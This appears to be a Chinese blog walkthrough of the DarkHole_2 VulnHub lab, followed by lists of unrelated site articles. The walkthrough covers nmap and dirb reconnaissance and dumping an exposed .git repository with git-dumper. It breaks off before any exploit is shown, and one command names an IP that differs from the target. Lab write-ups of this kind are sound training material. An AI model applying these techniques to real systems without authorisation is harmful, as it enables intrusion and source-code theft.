文章目录

  • 靶机环境
  • 一、信息收集
  • 二、 漏洞利用
  • 三、权力提升
  • 总结

靶机环境

攻击机:kali
IP:192.168.247.129
靶机:DarkHole_2
IP:192.168.247.131

一、信息收集

输入:nmap -A -T4 -sV -p- 192.168.247.131

Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-14 06:45 EST
Nmap scan report for 192.168.247.131
Host is up (0.00058s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 57:b1:f5:64:28:98:91:51:6d:70:76:6e:a5:52:43:5d (RSA)
|   256 cc:64:fd:7c:d8:5e:48:8a:28:98:91:b9:e4:1e:6d:a8 (ECDSA)
|_  256 9e:77:08:a4:52:9f:33:8d:96:19:ba:75:71:27:bd:60 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: DarkHole V2
| http-git:
|   192.168.247.131:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: i changed login.php file for more secure
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
MAC Address: 00:0C:29:54:32:C1 (VMware)
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5
OS details: Linux 5.0 - 5.3
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE
HOP RTT     ADDRESS
1   0.58 ms 192.168.247.131OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.29 seconds

发现有两个端口,开放,一个是80,一个是22

输入:dirb http://192.168.247.131

-----------------
DIRB v2.22
By The Dark Raver
-----------------START_TIME: Fri Jan 14 06:51:10 2022
URL_BASE: http://192.168.247.131/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612                                                          ---- Scanning URL: http://192.168.247.131/ ----
+ http://192.168.247.131/.git/HEAD (CODE:200|SIZE:23)
==> DIRECTORY: http://192.168.247.131/config/
+ http://192.168.247.131/index.php (CODE:200|SIZE:740)
==> DIRECTORY: http://192.168.247.131/js/
+ http://192.168.247.131/server-status (CODE:403|SIZE:280)
==> DIRECTORY: http://192.168.247.131/style/                                                       ---- Entering directory: http://192.168.247.131/config/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.247.131/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.247.131/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)-----------------
END_TIME: Fri Jan 14 06:51:14 2022
DOWNLOADED: 4612 - FOUND: 3

二、 漏洞利用

发现有个.git文件,也就意味这有可能存在着源码泄露

使用git-dumper工具,这里使用的是pip3安装

输入: pip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple --trusted-host pypi.tuna.tsinghua.edu.cn git-dumper

下载git文件内容

输入:git-dumper http://192.168.184.143/.git/ backup

切换到backup文件,查看日志

输入:git log

commit 0f1d821f48a9cf662f285457a5ce9af6b9feb2c4 (HEAD -> master)
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date:   Mon Aug 30 13:14:32 2021 +0300i changed login.php file for more securecommit a4d900a8d85e8938d3601f3cef113ee293028e10
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date:   Mon Aug 30 13:06:20 2021 +0300I added login.php file with default credentialscommit aa2a5f3aa15bb402f2b90a07d86af57436d64917
Author: Jehad Alqurashi <anmar-v7@hotmail.com>
Date:   Mon Aug 30 13:02:44 2021 +0300First Initialize

查看到有三次的日志备份

输入:git diff +commit 查看提交的区别

┌──(root												


											

DarkHole_2相关推荐
	

    
								
  1. .git文件泄露的一次渗透darkhole2
		
    darkhole2通关过程 这是一个困难难度的靶场,通过不小心泄露的.git文件收集信息,再利用漏洞脱库登录,最后利用rce漏洞进行提权.也可以用通用来打. 信息收集 扫描靶机ip nmap -sP  ...
    
		
    2. 
						
  2. [渗透测试学习靶机05] vulnhub靶场 DarkHole: 2
		
    kali IP地址为192.168.127.139 靶机 IP地址为192.168.127.144 目录 一.信息搜集 1.1.扫描主机口 1.2. 扫描端口 1.3.访问端口 1.4.扫描目录 二. ...
    
		
    3. 
						
  3. DARKHOLE 2
		
    准备 攻击机: kali, win11 靶机: DARKHOLE: 2 NAT 192.168.91.0 网段 下载链接: https://www.vulnhub.com/entry/darkhole ...
    
		
    4. 
		


					

最新文章
	

    
						
  1. client-go入门之3:解析 yaml 文件并创建 k8s 资源对象
		
    2. 
						
  2. 洛谷 P1004 方格取数 【多线程DP/四维DP/】
		
    3. 
						
  3. 禁用DropDownList某一选项
		
    4. 
						
  4. mysql 去掉默认约束_06. 默认约束-创建、添加和删除
		
    5. 
						
  5. windows 安装mongodb
		
    6. 
						
  6. php怎么获取cid,Typecho根据文章cid获取文章信息
		
    7. 
						
  7. winform学习之-----页面设计-20160523
		
    8. 
						
  8. [Python+Anaconda] 查看Python、Anaconda下python、CUDA、函数库的版本
		
    9. 
						
  9. 硬核!尽量避免 bug 手法,让测试彻底失业
		
    10. 
						
  10. iOS客户端安装包大小优化
		
    11. 
						
  11. Android JOSON应用及详解
		
    12. 
						
  12. html  首行缩进两个空格,关于css的text-indent首行缩进两个字符和图片缩进的问题...
		
    13. 
						
  13. 听听周报-谷歌发布首款真无线耳机 Pixel Buds|苹果发布全新头戴式耳机 Beats Solo Pro
		
    14. 
						
  14. 关于 Java.lang.NoClassDefFoundError 解决
		
    15. 
						
  15. 机器人学回炉重造(1-2):各种典型机械臂的正运动学建模(标准D-H法)
		
    16. 
						
  16. yapi 权限_YAPI安装方法
		
    17. 
						
  17. 62 stm32 usb自定义hid复合设备修改实验
		
    18. 
						
  18. 在win10上编译webRTC(问题篇)
		
    19. 
						
  19. 中国电子竞技市场:外国玩家的机遇与挑战
		
    20. 
						
  20. Java父子二人求父子年龄_六年级数学年龄问题应用题练习2013
		
    21. 
		

	


热门文章
	

    
									
  1. throw new Error() 真实的用法和throw error 的方法
			
    2. 
						
  2. mini2440中nand falsh的使用
			
    3. 
						
  3. php中划线,html中下划线、删除线、上划线的样式与用法实例
			
    4. 
						
  4. 制作DeepLabV3Plus训练集
			
    5. 
						
  5. VRChat火了,但VR社交还没迎来最好的时代
			
    6. 
						
  6. C# 调用摄像头解析二维码
			
    7. 
						
  7. Windows操作系统万能Ghost全攻略
			
    8. 
						
  8. OaisimWithS1搭建笔记(2019.5)
			
    9. 
						
  9. 第十三届蓝桥杯大赛软件类国赛 C/C++ 大学B组 试题 G: 故障
			
    10. 
						
  10. matlab 4轴机器人建模,SCARA机器人运动学分析及MATLAB建模仿真.pdf
			
    11.